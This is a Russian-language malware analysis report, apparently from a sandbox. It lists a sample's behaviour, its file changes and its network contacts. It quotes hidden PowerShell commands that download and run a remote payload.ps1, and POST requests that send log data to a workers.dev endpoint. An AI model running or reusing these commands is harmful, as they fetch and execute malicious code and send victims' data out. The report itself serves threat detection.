Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://ql.pe/f/payload.ps1
Запускает на исполнение
- '%WINDIR%\syswow64\taskkill.exe' /f /im mshta.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\vbscriptlog.txt
- %TEMP%\response.txt
Сетевая активность
Подключается к
- 'ql.pe':80
- 'ql.pe':443
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
TCP
Запросы HTTP GET
- http://ql.pe/f/payload.ps1
Другие
- 'ql.pe':443
UDP
- DNS ASK ql.pe
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Try { IEX (New-Object Net.WebClient).DownloadString('http://ql.pe/f/payload.ps1') } Catch { Exit 1 }" (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Try { Invoke-WebRequest -Uri 'https://telegram.margalitbronze.workers.dev' -Method POST -Body (@{logContents='7/7/2025 3:37:01 PM ... (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "Try { Invoke-WebRequest -Uri 'https://telegram.margalitbronze.workers.dev' -Method POST -Body (@{logContents='7/7/2025 3:37:01 PM - INFO: Log sessio...
- '%WINDIR%\syswow64\taskkill.exe' /f /im mshta.exe (со скрытым окном)
